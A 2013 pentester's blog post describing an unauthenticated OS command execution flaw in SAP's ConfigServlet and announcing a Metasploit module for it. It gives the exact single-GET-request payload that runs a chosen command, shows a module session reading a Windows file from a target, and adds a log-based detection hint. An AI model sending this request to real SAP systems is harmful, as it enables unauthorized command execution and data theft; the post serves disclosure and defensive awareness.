Sunday, April 21, 2013

SAP ConfigServlet OS command execution metasploit module

If you have ever searched for SAP vulnerabilities, I am sure you have come across some of the ERPScan team's excellent research. This happened in our current pentest project as well: a colleague of mine identified several SAP systems in the target network range, and we tried to find well-known vulnerabilities for them.

We found a great presentation (Breaking SAP Portal) from Hacker Halted 2012 by Dmitry Chastuchin from ERPScan. One of the slides contains a very interesting screenshot of the exploitation of a simple, remote, unauthenticated OS command execution vulnerability. Yes, with a single GET request it is possible to execute OS commands on the remote system. I searched for existing exploit implementations for this vulnerability, but there was no public Metasploit or other exploit available. Surprisingly, not only were there no exploits, there were no relevant search results for this vulnerability at all, so I decided to write a Metasploit module for it.

The vulnerability exists in the /ctc/servlet/ConfigServlet servlet: with the proper parameters you can achieve OS command execution, and no authentication is required to reach the servlet.

To trigger the vulnerability you only have to request something like this:
GET /ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=whoami
The param value is a semicolon-separated list naming the class (com.sap.ctc.util.FileSystemConfig), the method (EXECUTE_CMD) and the command line to run (CMDLINE=...). The servlet will happily execute the command from the CMDLINE part and pass its output back in the generated HTTP response. Vendor patches exist for this vulnerability, but you know how frequently companies apply them, so you have a good chance of finding a vulnerable version and exploiting it successfully. Because the whole attack is a single unauthenticated GET request, it is also easy to spot from the defender's side: web server or reverse proxy logs containing requests to ConfigServlet with EXECUTE_CMD in the param value are a strong indicator of exploitation attempts.

It was easy to implement this exploit in metasploit. You can see my module in action:
msf auxiliary(sap_configservlet_exec_noauth) > show options 

Module options (auxiliary/admin/sap/sap_configservlet_exec_noauth):

   Name       Current Setting                 Required  Description
   ----       ---------------                 --------  -----------
   CMD        cmd /c type c:\windows\win.ini  yes       The command to execute
   Proxies                                    no        Use a proxy chain
   RHOST      10.1.10.100                     yes       The target address
   RPORT      50000                           yes       The target port
   TARGETURI  /ctc/servlet                    yes       Path to ConfigServlet
   VHOST                                      no        HTTP server virtual host

msf auxiliary(sap_configservlet_exec_noauth) > run

[*] 10.1.10.100:50000 - Sending remote command: cmd /c type c:\windows\win.ini
[+] 10.1.10.100:50000 - Exploited successfully

10.1.10.100:50000 - Command: cmd /c type c:\windows\win.ini

10.1.10.100:50000 - Output: TYPE=S
STATE=
INFO_SHORT=     + Process created!
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
<BR>CONFIGURATION=

[*] Auxiliary module execution completed
msf auxiliary(sap_configservlet_exec_noauth) >
As you can see, the part of the received output after "Process created!" is the output of the executed command, in this case the contents of c:\windows\win.ini.

Check the updates section in this post to access the code and to follow the life of my module.

[Updates]
